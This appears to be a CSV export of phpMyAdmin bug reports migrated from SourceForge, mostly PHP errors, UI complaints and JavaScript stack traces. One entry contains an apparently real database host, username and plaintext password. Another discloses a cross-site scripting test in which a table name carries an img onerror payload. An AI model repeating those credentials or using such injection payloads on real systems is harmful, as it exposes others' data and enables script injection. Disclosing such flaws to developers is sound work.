libraries common.inc.php) I found usr share doc phpmyadmin examples create tables.sql.gz and gunzipped it, and basically splattered it into what looked like the right directories across all of the multiple places phpmyadmin likes to hide out in Ubuntu.
It still complained.
EDIT Apologies despite pasting from the examples, markdown formatting doesn t seem to be working for me.
So I then imported create tables.sql manually and although it looks like it created all the tables in that sql file, it STILL complains.
Original URL https sourceforge.net p phpmyadmin bugs 4627 Original author digitaltoast Found in version 4.3.0","bug"
"24444","11028","PHP error while exporting schema as PDF.
Fatal error Call to undefined function PMA getMIME ) in C \wamp\apps\phpmyadmin\libraries\plugins\schema\pdf\Pdf Relation Schema.class.php on line 939 Original URL https sourceforge.net p phpmyadmin bugs 4628 Original author madhuracj Found in version 4.3.0","bug"
"24444","11029","Problem with custom SQL queries using cookie authentication.
I have recently upgraded my phpMyAdmin installation from 4.2.13 to 4.3.0 and now 4.3.1, but with both newer versions custom SQL queries seem to be broken with auth type cookie) I either get a token mismatch warning when I enter a custom SQL query and select OK, or nothing happens at all.
When I select a different menu like Export) afterwards, I get disconnected and have to log in again.
This only happens wehen I enter a custom SQL query, if I select a table in the left menu and then select SQL in the top menu and click OK, then the predefined query is executed without errors.
However, if I modify the query, then the error usually occurs again.
Original URL https sourceforge.net p phpmyadmin bugs 4629 Original author tobias vrmd Found in version 4.3.1","bug"
"24444","11030","Server selector submits two server parameters.
Server selector submits two server parameters when the current server is not the default server.
Original URL https sourceforge.net p phpmyadmin bugs 4631 Original author madhuracj Found in version 4.3.0","bug"
"24444","11031","Notice in .
libraries Util.class.php 1916 Undefined index query.
Hi, Updating from 4.2.X I got a lot of errors Notice in .
libraries Util.class.php 1916 Undefined index query Backtrace Code .
libraries Util.class.php 1821 PMA Util splitURLQuery string ) .
libraries Util.class.php 1277 PMA Util linkOrButton string , string Inline , array, ) .
libraries DisplayResults.class.php 4552 PMA Util getMessage object, string SELECT FROM `other` , string success , ) .
libraries sql.lib.php 1963 PMA DisplayResults >getTable object, string urdr111111 , array, ) .
libraries sql.lib.php 2220 PMA getHtmlForSqlQueryResultsTable NULL, object, string allmytv lc , string , string .
themes pmahomme img , NULL, string urdr111101 , string LIMIT 0, 25 , boolean true, string 1434 , integer 25, NULL, object, array, ) .
libraries sql.lib.php 2321 PMA sendQueryResponseForResultsReturned object, array, string allmytv lc , string other , NULL, NULL, NULL, object, string , string .
themes pmahomme img , string LIMIT 0, 25 , string 1434 , integer 25, string SELECT FROM `other` LIMIT 0, 25 , NULL, NULL, NULL, NULL, NULL, string SELECT FROM `other` , NULL, ) .
libraries sql.lib.php 2432 PMA sendQueryResponse integer 25, string 1434 , boolean false, string allmytv lc , string other , NULL, array, object, NULL, object, NULL, NULL, NULL, string , string .
themes pmahomme img , string LIMIT 0, 25 , string SELECT FROM `other` LIMIT 0, 25 , NULL, NULL, NULL, NULL, NULL, string SELECT FROM `other` , NULL, ) .
sql.php 204 PMA executeQueryAndSendQueryResponse array, boolean true, string allmytv lc , string other , NULL, NULL, NULL, boolean false, NULL, NULL, NULL, NULL, string , string .
themes pmahomme img , NULL, NULL, NULL, string SELECT FROM `other` , NULL, NULL, ) Original URL https sourceforge.net p phpmyadmin bugs 4632 Original author derevko Found in version 4.3.1","bug"
"24444","11032","Wrong parameter in fetchValue.
In libraries insert edit.lib.php around line 2380 there is probably a wrong parameter result) in the call to fetchValue.
It is not a string.
It probably should be sql for real value instead.
Discovered by changing an inline varchar field to NULL in a view.
sql for real value = SELECT .
PMA Util backquote table) .
.
.
PMA Util backquote column name) .
FROM .
PMA Util backquote db) .
.
.
PMA Util backquote table) .
WHERE .
REQUEST[ where clause ][0]; result = GLOBALS[ dbi ] >tryQuery sql for real value); fields meta = GLOBALS[ dbi ] >getFieldsMeta result); meta = fields meta[0]; new value = GLOBALS[ dbi ] >fetchValue result); if new value !== false) { Original URL https sourceforge.net p phpmyadmin bugs 4633 Original author joergent Found in version 4.3.1","bug"
"24444","11033","Disable foreign key doesn t work with a single query SQL file.
Disable foreign key , while import, doesn t work properly.
I tried `fk test import.sql` attached) on DB created by `fk test.sql` attached).
And it always gives a foreign key constraint fails error.
Original URL https sourceforge.net p phpmyadmin bugs 4927 Original author nisargjhaveri Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4927 attachment fk test.sql Attachment http sourceforge.net p phpmyadmin bugs 4927 attachment fk test import.sql","bug"
"24444","11034","Token mismatch while creating configuration storage.
It gives token mismatch error and couple of other warning when trying to create configuration storage via operation tab of some database.
Original URL https sourceforge.net p phpmyadmin bugs 4635 Original author nisargjhaveri Found in version 4.3.1","bug"
"24444","11035","Ordering of Downloads.
http www.phpmyadmin.net home page downloads.php Sometimes english is before all languages, sometimes it s the other way around.
Could this be fixed?
Original URL https sourceforge.net p phpmyadmin bugs 4636 Original author olafvdspek Found in version 3.3.7","bug"
"24444","11036","Field Alignment.
Fields are not properly aligned.
Original URL https sourceforge.net p phpmyadmin bugs 4637 Original author olafvdspek Found in version 4.3.1 Attachment http sourceforge.net p phpmyadmin bugs 4637 attachment unaligned.PNG","bug"
"24444","11037","Default Export Method setting broken.
I chose Custom without question but it still starts with the question..
Original URL https sourceforge.net p phpmyadmin bugs 4638 Original author olafvdspek Found in version 4.3.1","bug"
"24444","11038","4.3.2) Export SQL missing indentation first field.
The first field isn t properly indented CREATE TABLE IF NOT EXISTS `bans` `id` int 10) unsigned NOT NULL, `added` datetime NOT NULL DEFAULT 0000 00 00 00 00 00 , Original URL https sourceforge.net p phpmyadmin bugs 4639 Original author olafvdspek Found in version 4.3.1","bug"
"24444","11039","Incorrect reference to PHP6.
setup.html says For compatibility with PHP 6, remove a set magic quotes runtime 0); statement that you might find near the end of your configuration file.
I think 6 isn t the correct version.
Original URL https sourceforge.net p phpmyadmin bugs 4640 Original author olafvdspek Found in version 4.3.1","bug"
"24444","11040","phpmyadmin often fails to load due to specific load order.
Errors are e.g.
Uncaught exception ReferenceError Undefined variable PMA gotoWhitelist Uncaught exception TypeError Cannot convert PMA commonParams to object Uncaught exception TypeError .cookie is not a function as far as I can tell this is due to parallel requests to the server and different answer timings.
Since all scripts are independent parsed, there should not be any assumption on loading the js source.
Btw.
is there any good reason, why every script is prepended by php?
This causes the script to load everytime instead of using the browser cache.
Since the cookie changes between login and display everthing get s loaded at least twice.
Since some time no images are loaded I m not sure if this is due to JS CSS errors or due to an image source with a background which doesn t make any sense in my view <img src= themes dot.gif title= Neu anmelden alt= Neu anmelden class= icon ic s loggoff > =>if you really want a background image instead of an real image why don t you use span div.
Why load an 1px image???
Bad hack.
Do you really want to do everything in CSS JS?
Do you think this is the best way to realize an administration tool?
I have some tables where the newer versions of phpmyadmin is not able to display them 100 cols, using enums, sets).
You can see the content is loaded, but JS takes really long to add your column sorting rearranging inline edit code.
It would be a great benefit if this can be disabled.
Original URL https sourceforge.net p phpmyadmin bugs 4642 Original author mokraemer Found in version 4.3.1","bug"
"24444","11041","Import of export created with mysqldump.
Hi!
Whenever I try to import a file with phpMyAdmin 4.3.1 and 4.3.0) that I have created with mysqldump mysqldump quote names opt force routines triggers) I get the following error SQL query !40101 SET character set client = saved cs client ; MySQL said 1231 Variable character set client can t be set to the value of NULL When trying to import the same file with phpMyAdmin 4.2.6 and 4.2.7 it completes without any errors.
mysqldump versions MySQL dump 10.15 Distrib 10.0.14 MariaDB and MySQL dump 10.13 Distrib 5.5.29 Original URL https sourceforge.net p phpmyadmin bugs 4645 Original author fogelholk Found in version 4.3.1","bug"
"24444","11042","Version Check Broken.
> Version information 4.3.2, latest stable version 4.3.2 > A newer version of phpMyAdmin is available and you should consider upgrading.
The newest version is 4.3.2, released on 2014 12 12.
Original URL https sourceforge.net p phpmyadmin bugs 4646 Original author olafvdspek Found in version 4.3.6","bug"
"24444","11043","Consistency in borders.
Some columns have vertical borders and some don t. Is this intentional?
Original URL https sourceforge.net p phpmyadmin bugs 4648 Original author olafvdspek Found in version 4.3.2 Attachment http sourceforge.net p phpmyadmin bugs 4648 attachment borders.PNG","bug"
"24444","11044","Attributes field size smaller than others.
The attributes field is smaller than the other fields.
> I knew you would say that.
Why didn t you fix it?
p Original URL https sourceforge.net p phpmyadmin bugs 4649 Original author olafvdspek Found in version 4.3.2 Attachment http sourceforge.net p phpmyadmin bugs 4649 attachment unaligned.PNG","bug"
"24444","11045","Download button shouldn t link to phpMyAdmin 4.3.2 all languages.zip directly.
The download button links to phpMyAdmin 4.3.2 all languages.zip I think it should link to downloads.php instead, as not everybody wants the all languages.zip variant.
Original URL https sourceforge.net p phpmyadmin bugs 4650 Original author olafvdspek Found in version 4.3.2","bug"
"24444","11046","don t open console with esc.
Please don t open console with ESC !
If you re typing sql or anything else completion from browser, or by codemirror is canceled by ESC, which opens cloeses the console everytime!
Original URL https sourceforge.net p phpmyadmin bugs 4651 Original author mokraemer Found in version 4.3.2","bug"
"24444","11047","DB not shown in left tree.
phpmyadmin didn t show a database.
2 databases exist in this installation information schema and db43750 10 .
The database db43750 10 is not shown in the left frame and also not in the databases tab.
The SQL query SHOW DATABASES lists both databases.
In versions < 4.3 all databases were shown with the same configuration.
The database is available at host mysql5.ifsam.net user db43750 10 password 9=p2dbUqmh3C Original URL https sourceforge.net p phpmyadmin bugs 4652 Original author j0erch Found in version 4.3.2","bug"
"24444","11048","Always connection error was shown, on setup at tab configuration storage .. Hi, when setup a new phpMyAdmin by using www.mydomian.tld setup and configuring the configuration storage always a database connection error was shown.
The apache log file shows following lines start [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 auth type in usr share phpMyAdmin libraries config Validator.class.php on line 312, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 auth type in usr share phpMyAdmin libraries config Validator.class.php on line 319, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 auth type in usr share phpMyAdmin libraries config Validator.class.php on line 328, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 auth type in usr share phpMyAdmin libraries config Validator.class.php on line 336, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 pmadb in usr share phpMyAdmin libraries config Validator.class.php on line 371, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 controluser in usr share phpMyAdmin libraries config Validator.class.php on line 376, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 controlpass in usr share phpMyAdmin libraries config Validator.class.php on line 381, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 connect type in usr share phpMyAdmin libraries config Validator.class.php on line 388, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 host in usr share phpMyAdmin libraries config Validator.class.php on line 389, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 port in usr share phpMyAdmin libraries config Validator.class.php on line 389, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 socket in usr share phpMyAdmin libraries config Validator.class.php on line 390, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 controluser in usr share phpMyAdmin libraries config Validator.class.php on line 390, referer http www.mydomain.tld setup index.php [ error] [pid 5432] [client 192.168.0.90 41216] PHP Warning Illegal string offset Servers 1 controlpass in usr share phpMyAdmin libraries config Validator.class.php on line 391, referer http www.mydomain.tld setup index.php stopp I was looking at usr share phpMyAdmin libraries config Validator.class.php and compared this to an older installation.
So I figured out, that function validateServer values) the values[ Servers 1 extension ] is missing, there and in other code lines too?
So can you help?
Thank you!
Original URL https sourceforge.net p phpmyadmin bugs 4653 Original author andersonthomas Found in version 4.3.2","bug"
"24444","11049","Fatal javascript error has occured.
Hello, I m using phpMyAdmin on Xampp, I ve tried to update form version 4.1. to version 4.9.
Since then, I cannot do anything using Google Chrome.
It works fine on Mozilla Firefox though.
{ pma version 4.4.9 , browser name CHROME , browser version 43.0.2357.81 , user os Win , server software Apache 2.4.12 Win32) OpenSSL 1.0.1l PHP 5.6.8 , user agent string Mozilla 5.0 Windows NT 6.1; WOW64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 43.0.2357.81 Safari 537.36 , locale en , configuration storage enabled , php version 5.6.8 , exception type js , exception { mode stack , name TypeError , message ...).live is not a function , stack [ { line 235, func , context [ lastException = null; , notifyHandlers.apply null, [stack, null].concat args)); , } , }, stack.incomplete ?
2000 0)); , , throw ex; re throw to propagate to the top level and cause wind ... , } , , report.subscribe = subscribe; , report.unsubscribe = unsubscribe; , return report; ], filename tracekit tracekit.js }, { func HTMLDocument.<anonymous> , line 274, column 39 , context [ }); End of event handler for Foreign Key Check , , , Ajax Event handler for Truncate Table , , \ a.truncate table anchor.ajax\ ).live click , function event) { , event.preventDefault ); , , , var this anchor Object referring to the anchor clicked , ], filename db structure.js }, { func HTMLDocument.new func , line 279, column 33 , context [ , wrap function function func) { , if !func.wrapped) { , var new func = function ) { , try { , return func.apply this, arguments); , } catch x) { , TraceKit.report x); , } , }; , new func.wrapped = true; ], filename error report.js }, { func HTMLDocument.m.event.dispatch , line 3, column 8436 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func HTMLDocument.
event.dispatch , line 374, column 19 , context [ event.dispatch = function event ){ , \tif .data this, \ suppress.\ event.type ) new Date ).getTime ) > 0 ){ , \t\t .removeData this, \ suppress.\ event.type ); , \t\treturn; , \t} , \treturn dispatch.apply this, arguments ); , }; , , event fix hooks for touch events... , var touchHooks = , event.fixHooks.touchstart = ], filename jquery jquery.event.drag 2.2.js }, { func HTMLDocument.r.handle , line 3, column 5146 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Object.m.event.trigger , line 3, column 7537 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func HTMLDocument.<anonymous> , line 3, column 15404 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Function.m.extend.each , line 2, column 2973 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func m.fn.m.each , line 2, column 835 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func m.fn.extend.trigger , line 3, column 15380 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js } ], useragent Mozilla 5.0 Windows NT 6.1; WOW64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 43.0.2357.81 Safari 537.36 , incomplete false , partial true , uri db structure.php?target= }, script name db structure.php , microhistory { pages [ { hash prefs forms.php?db= table= server=1 target= token=82300d8dedf4fea28a9415455efc1b43 }, { hash db structure.php?db=setup table= server=1 target= token=82300d8dedf4fea28a9415455efc1b43 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext P , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } } ], current index 2 } } Original URL https sourceforge.net p phpmyadmin bugs 4949 Original author jonathan parl Found in version 4.4.9 Attachment http sourceforge.net p phpmyadmin bugs 4949 attachment fatal javascript error.jpg","bug"
"24444","11050","file get contents usr share phpmyadmin examples create tables.sql) failed to open stream No such file or directory.
Note this is identical to https sourceforge.net p phpmyadmin bugs 4627 however that ticket is marked as fixed.
Re paste with updated error) Using the tuxpoldo phpmyadmin repo I apt get updated ed and got 4.3.2deb0.1, but I also got an error that appears every time I switch databases.
Warning in .
libraries relation.lib.php 1820 file get contents usr share phpmyadmin examples create tables.sql) failed to open stream No such file or directory Backtrace .
libraries relation.lib.php 1820 file get contents string usr share phpmyadmin examples create tables.sql ) .
libraries core.lib.php 999 PMA getDefaultPMATableNames ) .
libraries common.inc.php 1155 PMA checkAndFixPMATablesInCurrentDb ) .
sql.php 14 require once .
libraries common.inc.php) I found usr share doc phpmyadmin examples create tables.sql.gz and gunzipped it, and basically splattered it into what looked like the right directories across all of the multiple places phpmyadmin likes to hide out in Ubuntu.
It still complained.
EDIT Apologies despite pasting from the examples, markdown formatting doesn t seem to be working for me.
So I then imported create tables.sql manually and although it looks like it created all the tables in that sql file, it STILL complains.
Original URL https sourceforge.net p phpmyadmin bugs 4654 Original author digitaltoast Found in version 4.3.2","bug"
"24444","11051","Trying to save chart as image crashes the browser.
Original URL https sourceforge.net p phpmyadmin bugs 4951 Original author madhuracj Found in version 4.4.9","bug"
"24444","11052","Undefined index collation connection.
After selecting a database Notice in .
libraries Header.class.php 227 Undefined index collation connection Backtrace .
libraries Header.class.php 257 PMA Header >getJsParams ) .
libraries Header.class.php 208 PMA Header >getJsParamsCode ) .
libraries Header.class.php 136 PMA Header > addDefaultScripts ) .
libraries Response.class.php 102 PMA Header > construct ) .
libraries Response.class.php 131 PMA Response > construct ) .
libraries common.inc.php 1065 PMA Response getInstance ) .
index.php 12 require once .
libraries common.inc.php) Notice in .
index.php 212 Undefined variable collation connection Backtrace Also, I did tick Automatically send report next time but it s still asking me..
Original URL https sourceforge.net p phpmyadmin bugs 4655 Original author olafvdspek Found in version 4.3.4","bug"
"24444","11053","Some error popups fade away too quickly.
Sometimes pMA pops up a message.
Problem is this messages fades away far too quickly to be able to read it.
Original URL https sourceforge.net p phpmyadmin bugs 4656 Original author olafvdspek Found in version 4.3.2","bug"
"24444","11054","Don t have default blowfish secret.
I don t know how this secret is used but I think it should NOT have a default.
It s like default passwords... cfg[ blowfish secret ] = a8b7c6d ; YOU MUST FILL IN THIS FOR COOKIE AUTH!
Original URL https sourceforge.net p phpmyadmin bugs 4657 Original author olafvdspek Found in version 4.3.2","bug"
"24444","11055","Illegal string offset.
Illegal string offset Data length Illegal string offset Index length Seems to happen in PMA getHtmlForDisplayTableStats ), not sure for which storage engine.
See https reports.phpmyadmin.net reports view 4501 and 4502 Original URL https sourceforge.net p phpmyadmin bugs 4658 Original author lem9 Found in version 4.3.2","bug"
"24444","11056","Designer Javascript error with specially crafted table name.
Left as private for now because I didn t look in to whether this is a serious vulnerability.
It doesn t seem to be, but I error on the side of caution.
If you create a database that contains a table named ` <img src=x onerror=alert 1)> `, loading the Designer tab causes a Javascript error.
Complete error report information follows <pre> { pma version 4.5.0 dev , browser name FIREFOX , browser version 38.0 , user os Mac , server software Apache 2.2.22 Debian) , user agent string Mozilla 5.0 Macintosh; Intel Mac OS X 10.10; rv 38.0) Gecko 20100101 Firefox 38.0 , locale en , configuration storage enabled , php version 5.4.39 0 deb7u2 , exception type js , exception { mode stack , name Error , message Syntax error, unrecognized expression check vis xsses.
27 3Cimg src 3Dx onerror 3Dalert 281 29 3E 27 , stack [ { func s< fb.error , args , line 2, column 12720 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func s< fb.tokenize , args , line 2, column 18596 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func s< fb.select , args , line 2, column 21321 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func fb , args , line 2, column 7352 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func .find , args , line 2, column 23593 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func m.fn.init , args , line 2, column 24160 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func m , args , line 2, column 393 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func displayErrors , args , line 364, column 22 , context [ return item !== ; , }; , , for var field id in error list) { , var errors = error list[field id]; , var field = field id); , var isFieldset = field.attr tagName ) == FIELDSET ; , var errorCnt; , if isFieldset) { , errorCnt = field.find dl.errors ); , } else { ], filename config.js }, { func setupValidation , args , line 531, column 9 , context [ run all fieldset validators , fieldset ).each function ) { , validate fieldset this, false, errors); , }); , , displayErrors errors); , } else if check page refresh) { , check page refresh.val 1 ); , } , } , ], filename config.js }, { func ?
, args , line 538, column 5 , context [ check page refresh.val 1 ); , } , } , , AJAX.registerOnload config.js , function ) { , setupValidation ); , }); , , , END Form validation and field operations , ], filename config.js }, { func ErrorReport.wrap function new func , args , line 276, column 28 , context [ , wrap function function func) { , if !func.wrapped) { , var new func = function ) { , try { , return func.apply this, arguments); , } catch x) { , TraceKit.report x); , } , }; , new func.wrapped = true; ], filename error report.js }, { func m.event.dispatch , args , line 3, column 8384 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func event.dispatch , args , line 373, column 9 , context [ event.dispatch = function event ){ , \tif .data this, \ suppress.\ event.type ) new Date ).getTime ) > 0 ){ , \t\t .removeData this, \ suppress.\ event.type ); , \t\treturn; , \t} , \treturn dispatch.apply this, arguments ); , }; , , event fix hooks for touch events... , var touchHooks = , event.fixHooks.touchstart = ], filename jquery jquery.event.drag 2.2.js }, { func m.event.add r.handle , args , line 3, column 5122 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func m.event.trigger , args , line 3, column 7535 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func .trigger < , args , line 3, column 15396 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func .each , args , line 2, column 2971 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func m.prototype.each , args , line 2, column 833 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func .trigger , args , line 3, column 15375 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func AJAX.fireOnload , args , line 109, column 9 , context [ , return void , , fireOnload function file) { , var eventName = onload AJAX.hash file); , document).trigger eventName); , if this.
debug) { , console.log , no need to translate , \ Fired event \ eventName \ for file \ file , ); ], filename ajax.js }, { func AJAX.scriptHandler.done , args , line 555, column 17 , context [ done function ) { , if typeof ErrorReport !== undefined ) { , ErrorReport.wrap global functions ); , } , for var i in this.
scriptsToBeFired) { , AJAX.fireOnload this.
scriptsToBeFired[i]); , } , AJAX.active = false; , }, , , Appends a script element to the head to load the scripts ], filename ajax.js }, { func ?
